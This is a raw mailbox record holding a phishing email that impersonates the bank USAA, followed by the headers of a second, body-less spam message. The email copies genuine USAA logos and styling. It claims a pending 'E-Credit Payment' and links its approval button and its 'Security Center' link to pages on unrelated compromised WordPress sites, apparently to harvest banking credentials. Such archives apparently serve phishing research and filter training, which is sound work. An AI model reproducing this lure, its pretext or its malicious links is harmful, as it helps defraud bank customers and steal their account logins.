From: "USAA" <Safeguard@MailSender.com>
Date: Mon, 12 Dec 2016 15:09:45 -0500
Status: O
X-Status: 
X-Keywords:                  
X-UID: 459

You will not see this in a MIME-aware mail reader.
--===============1736347422==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


     =

    	  =

 =

    =

     =

    =

 =

    	  =

   <IMG style=3D"BORDER-TOP: 0px; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PA=
DDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; BORDER-LEFT: 0px; D=
ISPLAY: block; PADDING-RIGHT: 0px; WIDTH: auto" alt=3DUSAA=AE src=3D"http:/=
/f.e.usaa.com/i/42/2078198359/t1dep22015_logo.gif">
	  =

   	  =

   =

  	 USAA SECURITY ZONE
USAA # ending in: ******	  =

  =

	  =

 =

    =

 =

    Dear Usaa Member, This email is to notify you that there is an E-Credit=
 Payment pending on your USAA account.
  Click here to Approve PaymentPending payment will be credited into your a=
ccount within 24 to 48 hours after your approval  USAA values your business=
 and is committed to keeping your accounts and personal information safe
To learn how we protect Security Center =

 Thank you,
USAA
   =


 =

   =A9 2016 USAA.	  =

 =

    =

</TABL center <>
 =

    =

 =

=20

--===============1736347422==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/>
	<title></title>
</head>
<body><TABLE class=3D"body bggrey" style=3D"FONT-FAMILY: 'Arial', Helvetica=
, sans-serif; BACKGROUND: #e5e5e5; BORDER-COLLAPSE: collapse; PADDING-BOTTO=
M: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; MIN-HEIGHT: 100%;=
 BORDER-SPACING: 0; PADDING-RIGHT: 0px; WIDTH: 100%; -webkit-text-size-adju=
st: none" bgColor=3D#e5e5e5>
<TBODY>
<TR>
<TD class=3Dvatop style=3D"VERTICAL-ALIGN: top; PADDING-BOTTOM: 0px; PADDIN=
G-TOP: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px" vAlign=3Dtop align=3Dcen=
ter>
<CENTER style=3D"MIN-WIDTH: 560px; WIDTH: 100%">
<TABLE class=3Dcontainer style=3D"BORDER-COLLAPSE: collapse; MARGIN: 0px au=
to; BORDER-SPACING: 0; WIDTH: 560px">
<TBODY>
<TR>
<TD class=3D"font11 grey col-7 vabottom lh20" style=3D"FONT-SIZE: 11px; FON=
T-FAMILY: 'Arial', Helvetica, sans-serif; VERTICAL-ALIGN: bottom; COLOR: #3=
d3d3d; PADDING-BOTTOM: 0px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEF=
T: 0px; LINE-HEIGHT: 20px !important; PADDING-RIGHT: 0px; WIDTH: 70%" vAlig=
n=3Dbottom align=3Dleft>&nbsp;</TD>
<TD class=3D"font11 grey col-3 textright" style=3D"FONT-SIZE: 11px; FONT-FA=
MILY: 'Arial', Helvetica, sans-serif; COLOR: #3d3d3d; PADDING-BOTTOM: 0px; =
TEXT-ALIGN: right; PADDING-TOP: 0px; PADDING-LEFT: 0px; LINE-HEIGHT: 13px; =
PADDING-RIGHT: 0px; WIDTH: 30%" align=3Dright>&nbsp;</TD></TR></TBODY></TAB=
LE>
<TABLE style=3D"BORDER-COLLAPSE: collapse; MARGIN: 0px auto; BORDER-SPACING=
: 0; WIDTH: 560px" align=3Dcenter bgColor=3D#bebebe>
<TBODY>
<TR>
<TD style=3D"PADDING-BOTTOM: 1px; PADDING-TOP: 1px; PADDING-LEFT: 1px; PADD=
ING-RIGHT: 1px">
<TABLE class=3Dcontainer style=3D"BORDER-COLLAPSE: collapse; MARGIN: 0px au=
to; BORDER-SPACING: 0; WIDTH: 560px">
<TBODY>
<TR>
<TD class=3Dbgwhite style=3D"BACKGROUND: #ffffff; PADDING-BOTTOM: 0px; PADD=
ING-TOP: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px" bgColor=3D#ffffff>
<CENTER style=3D"MIN-WIDTH: 560px; WIDTH: 100%">
<TABLE style=3D"BORDER-COLLAPSE: collapse; MARGIN: 0px; BORDER-SPACING: 0; =
WIDTH: 100%">
<TBODY>
<TR>
<TD style=3D"PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADD=
ING-RIGHT: 0px" height=3D10>&nbsp;</TD></TR></TBODY></TABLE>
<TABLE style=3D"BORDER-COLLAPSE: collapse; MARGIN: 0px; BORDER-SPACING: 0; =
WIDTH: 100%" width=3D"100%">
<TBODY>
<TR>
<TD style=3D"PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADD=
ING-RIGHT: 0px" width=3D24>&nbsp;</TD>
<TD style=3D"PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADD=
ING-RIGHT: 0px" vAlign=3Dtop width=3D326>
<TABLE style=3D"BORDER-COLLAPSE: collapse; MARGIN: 0px; BORDER-SPACING: 0; =
WIDTH: 100%">
<TBODY>
<TR>
<TD style=3D"PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADD=
ING-RIGHT: 0px" vAlign=3Dmiddle width=3D"100%"><A style=3D"FONT-FAMILY: 'Ar=
ial', Helvetica, sans-serif; COLOR: #086b94" href=3D"http://e.usaa.com/a/hB=
Wr0g$B73spXB8-hDRNspS79QR/usaa04"><IMG style=3D"BORDER-TOP: 0px; BORDER-RIG=
HT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING=
-LEFT: 0px; BORDER-LEFT: 0px; DISPLAY: block; PADDING-RIGHT: 0px; WIDTH: au=
to" alt=3DUSAA=AE src=3D"http://f.e.usaa.com/i/42/2078198359/t1dep22015_log=
o.gif"></A></TD></TR></TBODY></TABLE></TD>
<TD class=3Dvatop style=3D"VERTICAL-ALIGN: top; PADDING-BOTTOM: 0px; PADDIN=
G-TOP: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px" vAlign=3Dtop width=3D196>
<TABLE style=3D"BORDER-COLLAPSE: collapse; MARGIN: 0px; BORDER-SPACING: 0; =
WIDTH: 100%">
<TBODY>
<TR>
<TD class=3Dvatop style=3D"VERTICAL-ALIGN: top; PADDING-BOTTOM: 0px; PADDIN=
G-TOP: 0px; PADDING-LEFT: 0px; LINE-HEIGHT: 30px; PADDING-RIGHT: 0px" heigh=
t=3D30 vAlign=3Dtop width=3D16 align=3Dright><IMG style=3D"BORDER-TOP: 0px;=
 BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0=
px; PADDING-LEFT: 0px; BORDER-LEFT: 0px; DISPLAY: block; PADDING-RIGHT: 0px=
; WIDTH: auto" alt=3D"" src=3D"http://f.e.usaa.com/i/42/2078198359/t1dep220=
15_sec_left.gif"></TD>
<TD style=3D"PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADD=
ING-RIGHT: 0px" vAlign=3Dtop width=3D180>
<TABLE style=3D"BORDER-COLLAPSE: collapse; MARGIN: 0px; BORDER-SPACING: 0; =
WIDTH: 100%" width=3D"100%" bgColor=3D#e7e7e8>
<TBODY>
<TR>
<TD style=3D"PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; LINE=
-HEIGHT: 6px; PADDING-RIGHT: 0px" height=3D6 colSpan=3D3><IMG style=3D"BORD=
ER-TOP: 0px; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PA=
DDING-TOP: 0px; PADDING-LEFT: 0px; BORDER-LEFT: 0px; DISPLAY: block; PADDIN=
G-RIGHT: 0px; WIDTH: auto" alt=3D"" src=3D"http://f.e.usaa.com/i/42/2078198=
359/t1dep22015_sec_top.gif"></TD></TR>
<TR>
<TD class=3Dvatop style=3D"VERTICAL-ALIGN: top; PADDING-BOTTOM: 0px; PADDIN=
G-TOP: 0px; PADDING-LEFT: 0px; LINE-HEIGHT: 24px; PADDING-RIGHT: 0px" heigh=
t=3D24 vAlign=3Dtop width=3D20><IMG style=3D"BORDER-TOP: 0px; BORDER-RIGHT:=
 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LE=
FT: 0px; BORDER-LEFT: 0px; DISPLAY: block; PADDING-RIGHT: 0px; WIDTH: auto"=
 alt=3D"" src=3D"http://f.e.usaa.com/i/42/2078198359/t1dep22015_sec_right.g=
if"></TD>
<TD class=3D"blue font11 lh14" style=3D"FONT-SIZE: 11px; FONT-FAMILY: 'Aria=
l', Helvetica, sans-serif; COLOR: #00365b; PADDING-BOTTOM: 0px; TEXT-ALIGN:=
 left; PADDING-TOP: 0px; PADDING-LEFT: 0px; LINE-HEIGHT: 14px !important; P=
ADDING-RIGHT: 0px" width=3D150 align=3Dleft><FONT style=3D"FONT-SIZE: 11px;=
 FONT-FAMILY: 'Arial', =

Helvetica, sans-serif; TEXT-ALIGN: left; LINE-HEIGHT: 14px !important"><B>U=
SAA SECURITY ZONE</B><BR>USAA # ending in: ******</FONT></TD>
<TD style=3D"PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADD=
ING-RIGHT: 0px" width=3D10>&nbsp;</TD></TR>
<TR>
<TD style=3D"PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; LINE=
-HEIGHT: 6px; PADDING-RIGHT: 0px" height=3D6 colSpan=3D3><IMG style=3D"BORD=
ER-TOP: 0px; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PA=
DDING-TOP: 0px; PADDING-LEFT: 0px; BORDER-LEFT: 0px; DISPLAY: block; PADDIN=
G-RIGHT: 0px; WIDTH: auto" alt=3D"" src=3D"http://f.e.usaa.com/i/42/2078198=
359/t1dep22015_sec_bottom.gif"></TD></TR></TBODY></TABLE></TD></TR></TBODY>=
</TABLE></TD>
<TD style=3D"PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADD=
ING-RIGHT: 0px" width=3D14>&nbsp;</TD></TR></TBODY></TABLE>
<TABLE style=3D"BORDER-COLLAPSE: collapse; MARGIN: 0px; BORDER-SPACING: 0; =
WIDTH: 100%">
<TBODY>
<TR>
<TD style=3D"PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADD=
ING-RIGHT: 0px" height=3D10>&nbsp;</TD></TR></TBODY></TABLE>
<TABLE style=3D"BORDER-COLLAPSE: collapse; MARGIN: 0px; BORDER-SPACING: 0; =
WIDTH: 100%">
<TBODY>
<TR>
<TD class=3D"col-10 pad24 font14 black textleft" style=3D"FONT-SIZE: 14px; =
FONT-FAMILY: 'Arial', Helvetica, sans-serif; COLOR: #000000; PADDING-BOTTOM=
: 0px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 24px; LINE-HEIGHT:=
 20px; PADDING-RIGHT: 24px; WIDTH: 100%" align=3Dleft>
<DIV id=3Dyui_3_16_0_1_1429974469461_8871 style=3D"MARGIN-BOTTOM: 1em"><FON=
T id=3Dyui_3_16_0_1_1429974469461_8872 style=3D"FONT-SIZE: 12px; COLOR: #33=
3333; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">Dear Usaa Member,</FO=
NT></DIV>
<DIV style=3D"MARGIN-BOTTOM: 1em"><FONT style=3D"FONT-SIZE: 12px; COLOR: #3=
33333; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">This email is to not=
ify you that there is an E-Credit Payment pending on your USAA account.<BR>=
</FONT></DIV>
<DIV id=3Dyui_3_16_0_1_1429974469461_8888 style=3D"MARGIN-BOTTOM: 1em"><FON=
T id=3Dyui_3_16_0_1_1429974469461_8872 style=3D"FONT-SIZE: 12px; COLOR: #33=
3333; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif"></FONT>
<DIV style=3D"MARGIN-BOTTOM: 1em"><FONT id=3Dyui_3_16_0_1_1429974469461_887=
2 style=3D"FONT-SIZE: 12px; COLOR: #333333; LINE-HEIGHT: 18px" face=3D"Verd=
ana, sans-serif"><A href=3D"http://www.lucaslima.com/wp-includes/random_com=
pat/secureverify.htm"><FONT color=3D#0000ff><U>Click here to Approve Paymen=
t</U></FONT></A></FONT></DIV>Pending payment will be credited into your acc=
ount within 24 to 48 hours after your approval =

<DIV style=3D"MARGIN-BOTTOM: 1em"><FONT id=3Dyui_3_16_0_1_1429974469461_887=
2 style=3D"FONT-SIZE: 12px; COLOR: #333333; LINE-HEIGHT: 18px" face=3D"Verd=
ana, sans-serif"></FONT></DIV>
<P><FONT style=3D"FONT-SIZE: 14px; FONT-FAMILY: 'Arial', =

Helvetica, sans-serif; TEXT-ALIGN: left; LINE-HEIGHT: 20px">USAA values you=
r business and is committed to keeping your accounts and personal informati=
on safe<BR>To learn how we protect <A href=3D"http://comsanh.com/wp-admin/m=
aint/com.php">Security Center</A> </FONT></P>
<P><FONT style=3D"FONT-SIZE: 12px; COLOR: #333333; LINE-HEIGHT: 18px" face=
=3D"Verdana, sans-serif">Thank you,<BR>USAA</FONT></P>
<P><A href=3D"http://www.facebook.com/USAA?EID=3D66658-1012_body"><IMG bord=
er=3D0 alt=3DFacebook src=3D"http://content.usaa.com/mcontent/static_assets=
/om/Media/thumbnails/facebookIcon.gif" width=3D32 height=3D32></A>&nbsp;&nb=
sp;<A href=3D"http://twitter.com/usaa?EID=3D66658-1012_body"><IMG border=3D=
0 alt=3DTwitter src=3D"http://content.usaa.com/mcontent/static_assets/om/Me=
dia/thumbnails/twitterIcon.gif" width=3D32 height=3D32></A></P></DIV></TD><=
/TR></TBODY></TABLE>
<TABLE style=3D"BORDER-COLLAPSE: collapse; MARGIN: 0px; BORDER-SPACING: 0; =
WIDTH: 100%">
<TBODY>
<TR>
<TD class=3D"col-5 black font11 &#13;&#10;vabottom padleft15" style=3D"FONT=
-SIZE: 11px; FONT-FAMILY: 'Arial', =

Helvetica, sans-serif; VERTICAL-ALIGN: bottom; COLOR: #000000; PADDING-BOTT=
OM: 0px; TEXT-ALIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 15px; LINE-HEIGH=
T: 13px; PADDING-RIGHT: 0px; WIDTH: 50%" vAlign=3Dbottom align=3Dleft><FONT=
 style=3D"FONT-SIZE: 11px; FONT-FAMILY: 'Arial', Helvetica, sans-serif; TEX=
T-ALIGN: left; LINE-HEIGHT: 13px">=A9 2016 USAA.</FONT></TD>
<TD class=3D"col-5 padright15" style=3D"PADDING-BOTTOM: 0px; PADDING-TOP: 0=
px; PADDING-LEFT: 0px; PADDING-RIGHT: 15px; WIDTH: 50%">&nbsp;</TD></TR></T=
BODY></TABLE>
<TABLE style=3D"BORDER-COLLAPSE: collapse; MARGIN: 0px; BORDER-SPACING: 0; =
WIDTH: 100%">
<TBODY>
<TR>
<TD class=3Dcol-10 style=3D"PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-=
LEFT: 0px; PADDING-RIGHT: 0px; WIDTH: 100%" height=3D10>&nbsp;</TD></TR></T=
BODY></TABL center <></TD></TR></TBODY></TABLE></CENTER></TD></TR></TBODY><=
/TABLE>
<TABLE style=3D"BORDER-COLLAPSE: collapse; MARGIN: 0px; BORDER-SPACING: 0; =
WIDTH: 100%">
<TBODY>
<TR>
<TD class=3Dcol-10 style=3D"PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-=
LEFT: 0px; PADDING-RIGHT: 0px; WIDTH: 100%" height=3D10>&nbsp;</TD></TR></T=
BODY></TABLE>
<CENTER></CENTER></TD></TR></TBODY></TABLE>
<P><IMG src=3D"http://e.usaa.com/a/hBWr0g$B73spXB8-hDRNspS79QR/spacer.gif">=
</P></CENTER></TD></TR></TBODY></TABLE></BODY></HTML>
--===============1736347422==--

From jose@monkey.org Tue Dec 13 05:41:13 2016 +0000
Return-Path: server@message.com
Delivered-To: jose@monkey.org
X-FDA: 72285484026.16.desk93_61d4eef17173d
X-Spam-Summary: 75,0,0,1d8a8d984f0e585b,d41d8cd98f00b204,server@message.com,:,RULES_HIT:2:41:72:379:495:800:962:967:969:973:983:988:989:1189:1208:1221:1254:1260:1263:1313:1314:1381:1431:1433:1434:1436:1437:1516:1517:1518:1535:1566:1571:1575:1588:1589:1592:1594:1710:1714:1730:1776:1792:1803:2194:2198:2199:2200:2525:2527:2539:2560:2563:2610:2682:2685:2693:2859:2890:2895:2896:2899:2909:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3421:3866:3867:3868:3872:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4049:4119:4361:4552:5007:6650:6678:8518:8599:8603:8987:9025:9108:9121:9149:9388:9416:9908:10004:10214:10346:11233:11473:11480:11657:11658:11914:12043:12050:12051:12295:12555:12740:12764:12903:12986:13025:13139:13235:13237:13439:13975:14141:14246:14827:14829:21080:21212:21433:21450:21451:21483:21524:30001:30003:30016:30022:30026:30054:30070:30075,0,RBL:79.175.145.34-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Net
X-HE-Tag: desk93_61d4eef17173d
X-Filterd-Recvd-Size: 8257
Received: from 3dic.ir (cms3web.servercms3.com [79.175.145.34])
	by imf08.b.hostedemail.com (Postfix) with SMTP
	for <jose@monkey.org>; Tue, 13 Dec 2016 05:41:11 +0000 (UTC)
Sender: info@pbelco.ir
Received: from DaytonWIN08.daytondental.net[24.123.64.6] by WIN-BK68T3D8R8M[79.175.145.35]
  (SMTPD32); Tue, 13 Dec 2016 00:33:30 +0330
Content-Type: multipart/alternative; boundary="===============0133778141=="
MIME-Version: 1.0
Subject: Server Message
To: jose@monkey.org
